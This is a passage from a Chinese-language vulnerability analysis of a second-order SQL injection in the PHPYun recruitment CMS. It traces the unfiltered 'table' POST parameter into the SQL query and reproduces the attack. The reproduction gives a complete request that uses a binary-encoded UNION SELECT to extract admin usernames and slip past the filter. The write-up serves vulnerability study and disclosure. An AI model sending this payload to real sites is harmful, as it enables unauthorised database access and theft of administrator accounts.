那么漏洞点就在于resume_expect中的job_classid字段 。
job_classid字段的内容的传递如下图所示:
文章插图
所以如如果我们控制了resume_expect中的job_classid字段,我们就能够修改这条语句了 。
我们可以借助于saveresumeson_action()来向job_classid中插入我们的payload 。
saveresumeson_action()的关键代码如下:
文章插图
可以看到$table是直接通过"resume_".$_POST['table']拼接的,这也就以为着$table是我们可控的,之后$table进入了$this->obj->update_once()中 。
我们进入uptate_once()中:
文章插图
$table变量在update_once()没有进行任何的处理,直接进入到DB_update_all()中,我们追踪进入到DB_update_all()中:
文章插图
同样没有进行任何的处理 。
通过上面的跟踪分析,表明$table="resume_".$_POST['table'];赋值之后,中途$table变量没有进行任何的过滤直接进入了最终的SQL语句查询 。
如此整个攻击链就成功了,我们通过saveresumeson_action()中的$table可控,对resume_expect中的job_classid进行修改,之后通过likejob_action()读取job_classid字段的内容,执行我们的SQL语句 。
由于我们无法使用十六进制,此时我们就需要使用到二进制(0b)插入我们的payload 。
三.漏洞复现注册用户/创建简历
注册用户创建简历 。
此时在phpyun_resume_expect中存在一条id=1的记录 。
访问saveresumeson我们访问saveresumeson对应的URL,写入我们的payload 。根据语法,我们需要将table的内容设置为
expect' set class_id=1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #,uid=1 #由于1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #无法绕过SQL的防御,需要转化为二进制,是001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011那么最终的payload是:
URL:http://localhost/wap//member/index.php?c=saveresumeson&eid=1POST:name=JAVA%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%bc%80%e5%8f%91&sdate=2018-02&edate=2018-03&title=%e6%a0%b8%e5%bf%83%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98&content=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%ba%93%e5%bc%80%e5%8f%91&eid=1&id=&submit=%e4%bf%9d%e5%ad%98&table=expect%60set+job_classid%3d0b0011000100101001001010010010111100101010001010100010111101110101011011100110100101101111011011100010111100101010001010100010111101110011011001010110110001100101011000110111010000101111001010100010101000101111001100010010110001110101011100110110010101110010011011100110000101101101011001010010110000110011001011000011010000101100001101010010110000110110001011000011011100101100001110000010110000111001001011000011000100110000001011000011000100110001001011000011000100110010001011110010101000101010001011110110011001110010011011110110110100101111001010100010101000101111011100000110100001110000011110010111010101101110010111110110000101100100011011010110100101101110010111110111010101110011011001010111001000100011%2cuid%3d1+%23此时我们执行的SQL语句是:INSERT INTO `phpyun_resume_expect`set job_classid=0b001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011,uid=1 #` SET
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- PHP生命周期及fpm的运作方式
- 开源交换机操作系统
- PHP 安全问题入门:10 个常见安全问题 + 实例讲解
- Docker 安装 Nginx、PHP、MySQL、Tomcat、Python、Redis、Apache
- PHP的isset、is_null、empty()使用总结
- PHP中钩子的理解与实例教程
- PHP生成静态页面效果
- CPU处理器|打破x86/ARM垄断!中科院RISC-V开源处理器“香山”新归属敲定
- 开源免费的多功能数据库管理软件DBeaver
- PHP安装imagick扩展踩过的坑
